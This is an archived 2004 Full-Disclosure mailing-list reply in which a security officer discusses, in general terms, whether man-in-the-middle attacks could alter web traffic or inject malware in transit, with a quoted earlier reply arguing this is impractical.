lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <A65545E6CE47E54BA35EAFE7F2512CCB02AAA997@CDFNEXC1.na.sappi.com> From: James.Cupps at sappi.com (James.Cupps@...pi.com) Subject: [inbox] malware added in transit There is however, a type of attack sometimes referred to as a ghost attack that is similar to a man in the middle attack that can do something like this. The way it works is Eve inserts herself between Bob and Alice using some type of man in the middle attack then using certain scripts (the scripts are pretty simple I have written one in perl for testing) can selectively alter content of the data stream between them. The scary part of this type of attack is that it is even possible to use it to transparently (almost transparent a really quick user might catch the URL change but most of them ignore url's all the time anyway) step into an ssl session before it starts. I think it would be quite difficult to write this type of attack into malware but probably possible. The script just alters the http pieces of the html traffic to include the ssl (or normal http) site in the middle. You could alter that to include basic html exploits pretty easily but people tend to notice obvious changes to sites so it would have to be very precise. The other point to keep in mind is that you have to have some type of MIM (ARP spoof, DNC poison, route redirect etc...) in place and if you can do that you probably have a lot of influence over the target anyway. Building this part into malware might not even be possible. I'll have to think about it. But the way this work similar to what you described in the proxy comment below. I doubt any are currently in existence but nothing would surprise me. James Cupps Information Security Officer Sappi Fine Paper North America 207-854-7065 -----Original Message----- From: Curt Purdy [mailto:purdy@...man.com] Sent: Thursday, March 18, 2004 8:50 AM To: 'Paul'; full-disclosure@...ts.netsys.com Subject: RE: [inbox] [Full-Disclosure] malware added in transit Paul wrote: > Hi all, perhaps I'm way off-base but I've been under the impression that malware can be added > to clean transmissions as they pass through infected nodes. Is this possible? Unless you're talking about inserting a proxy in-line and manually grabbing the packets and manipulating them at a huge amount of work, you ARE way off-base. There is no malware I know of that would even know what the packets were, muchless re-assemble them into the original document, insert itself, and pass it on. Maybe by 2104... Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA Information Security Engineer DP Solutions ---------------------------------------- If you spend more on coffee than on IT security, you will be hacked. What's more, you deserve to be hacked. -- White House cybersecurity adviser Richard Clarke This message may contain information which is private, privileged or confidential and is intended solely for the use of the individual or entity named in the message. If you are not the intended recipient of this message, please notify the sender thereof and destroy / delete the message. Neither the sender nor Sappi Limited (including its subsidiaries and associated companies) shall incur any liability resulting directly or indirectly from accessing any of the attached files which may contain a virus or the like. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040318/04746fc4/attachment.html
Powered by blists - more mailing lists